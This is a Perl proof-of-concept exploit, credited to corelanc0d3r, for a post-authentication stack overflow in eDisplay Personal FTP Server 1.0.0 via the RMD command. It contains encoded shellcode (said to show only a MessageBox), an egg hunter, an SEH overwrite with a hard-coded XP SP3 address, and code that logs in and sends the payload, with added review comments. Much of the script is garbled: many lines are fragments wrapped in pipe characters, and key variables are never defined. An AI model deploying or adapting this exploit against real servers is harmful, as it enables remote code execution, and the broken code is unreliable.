Written by corelanc0d3r
Sunday, 21 March 2010 11:26
# Exploit Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF
# Type of sploit: Remote Code Execution (post-authentication: a valid FTP login is
#                 required; this PoC's payload only pops a MessageBox, see below)
# Bug found by  : loneferret (March 19, 2010)
# Reference     : http://www.exploit-db.com/exploits/11810
# Exploit date  : March 20, 2010
# Tested on     : XP SP3 En (VirtualBox)
# Greetz to     : loneferret, dookie2000ca and of course my friends at Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ----------------------------------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal!
# Note: you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# ----------------------------------------------------------------------------------------------------
# Before we begin: if you liked my quickzip.exe exploit,
# then you will certainly love this one too :-)
# ----------------------------------------------------------------------------------------------------
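# Banner and usage.  This script is a PoC for a post-authentication stack
# overflow in eDisplay Personal FTP Server 1.0.0 (triggered via RMD); it
# takes target host, target port, FTP user and FTP password positionally
# from @ARGV.  NOTE(review): the script runs without "use strict" /
# "use warnings"; that is left as-is here because later statements assign
# package globals and would not compile under strict.
print "|------------------------------------------------------------------|\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| http://www.corelan.be:8800 |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print " --==[ Exploit for eDisplay Personal FTP Server 1.0.0]==-- \n";
print " Author : corelanc0d3r\n\n";
print " usage: $0 <targetip> <targetport> <user> <password>\n";
# Stop early when the four positional arguments the usage line asks for are
# missing.  Without this guard the script carries on and tries to connect to
# whatever $ARGV[0]/$ARGV[1] happen to be and logs in with undefined values.
die " [!] Missing arguments, see usage above\n" if @ARGV < 4;
print " [+] Preparing payload\n";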
# Shellcode: alphanumeric (ASCII-only) encoded, with EDI as the encoder's base
# register (presumably EDI must point at the start of this blob when it runs).
# The decoded payload is a custom MessageBox, i.e. a benign demonstration.
| "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABX". |
| "P8ABuJIn98kMKn9QdEtJTTqzrNRcJUaXI54lKBQfPLKPv". |
| "VlnkqfGlLKW6THLKQngPlKP6FXpOtXD5ZSryeQ8QKO8aa". |
| "pLKPlututNkW5WLLKSdUUcHS1yznk3zvxlK1J5pwqxkZC". |
| "P7qYLKP4NkFa8ndqkOUayPkLNLNdKppt4JJaXOTMfaJgI". |
| "yxqKOKOKO7KSLwT6HPuINNkcjGTuQzKBFLK6lpKNkcj7l". |
| "faJKLKVdLKC1KXk9QTEtULSQksnRtHwYXTk9kUOyKrCXl". |
| "NpNfnxl62kXOlKOio9ok9ReUTMk3NiHKR3CowuLUtPRjH". |
| "LKKOkOiooyW5WxCXrLBLQ0KOqxFSWBVNCTU8qeT3CUT2M". |
| "XclvD6joyivQFKOsevdoyYRRpOKoXLbPMMlOw5LDdrrjH". |
| "qNKO9o9oPhTn6NfNV8phdp0dEcSBU8BLCQrNcSqxPcrOR". |
| "RSUtqKkmX1LTdtONiysrHTnVNqHUp3Xq0gK4i6N3XBGSQ". |
| "1ypnphSYsDUppaQxsTqycTEpTqxImXPLtdFrMYkQP1Zrs". |
| "b3cPQrrkOn0DqIPbpKOQEeXA"; |
# Custom-encoded egg hunter, generated with pvefindaddr:
#   !pvefindaddr encode ascii <bytes>
# The generated encoder only needed its bad characters fixed, but the 0x5C
# bytes below are needed to trigger the SEH overwrite at the correct offset.
| "\x2D\x70\x2D\x5C\x6F". #we need these 5C's !! |
| "\x2D\x70\x2C\x5C\x6F". #we need these 5C's !! |
| "\x75\x58"; #jump to decoded opcode |
# SEH record overwrite.
# nSEH is 4 bytes: 0x61 followed by three 'B' (0x42).  Both are ASCII-safe
# and, should they ever be executed, decode as harmless one-byte x86
# instructions (popad / inc edx).
my $nseh = "\x61" . ("B" x 3);
# SEH handler: a fixed address inside comctl32.ocx, written little-endian
# (pack 'V').  NOTE(review): this is a hard-coded XP SP3 address, so the
# exploit relies on that module always loading at the same base; this is why
# the "Tested on: XP SP3 En" line in the header matters.
my $seh = pack('V', 0x202D2B3C);    # comctl32.ocx 0x202D2B3C
| #encoded jumpback code to jump to encoded egg hunter |
| $jumpback=$jumpback."\x25\x4A\x4D\x4E\x55". |
# Filler so the whole buffer comes out at a fixed size: 1000 bytes minus
# everything placed so far, minus a further 20 + 5 bytes that the original
# author accounts for separately (their derivation is not visible here; the
# constants are kept verbatim).  "A" x (negative) yields "" in Perl.
my $consumed = length($buffer . $nseh . $seh . $decoder . $pad . $sc . $jumpback);
my $rest = "A" x (1000 - $consumed - 20 - 5);
# EAX fix-up stub (name from the original).  The bytes read as
# push edx / pop eax / 3 x sub eax,0x55555535 -- all printable ASCII opcodes.
my $aligneax = "\x52\x58" . ("\x2d\x35\x55\x55\x55" x 3);
# Final buffer layout.  The order is load-bearing: the SEH record has to land
# at the offset the decoder's 0x5C bytes are arranged for, so do not reorder.
my $payload = join '',
    $buffer,
    "CCCCCCCCCCCCCCCCCC",
    $decoder,
    $pad,
    $nseh,
    $seh,
    "BBB",
    $aligneax,
    $jumpback,
    $rest,
    $sc;
print " [+] Connecting to server ", $ARGV[0], " on port ", $ARGV[1], "\n";
| $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], |
| $ftp = <$sock> || die " [!] *** Unable to connect ***\n"; |
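print " [+] Logging in (user $user)\n";
# The bug is post-authentication: the vulnerable RMD handler is only reached
# once the server has accepted the login, so check the replies instead of
# firing blind.  Per RFC 959, USER normally answers 331 (password needed) and
# PASS answers 230 on success; some servers answer 230 to USER directly, so
# either reply starting with 230 counts as logged in.
print $sock "USER $user\r\n";
my $user_reply = <$sock>;
die " [!] No reply to USER\n" unless defined $user_reply;
print $sock "PASS $pass\r\n";
my $pass_reply = <$sock>;
die " [!] No reply to PASS\n" unless defined $pass_reply;
die " [!] Login failed: $pass_reply"
    unless ($user_reply =~ /^230/ || $pass_reply =~ /^230/);
print " [+] Sending payload (" . length($payload)." bytes)\n";
# Overflow trigger.  The trailing "\r\r\n" is sent exactly as the original
# author wrote it; the extra CR may be deliberate (it is what was tested), so
# it is not normalised to "\r\n" here.
print $sock "RMD ".$payload."\r\r\n";
print " [+] Shellcode size : " . length($sc)." bytes\n";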
|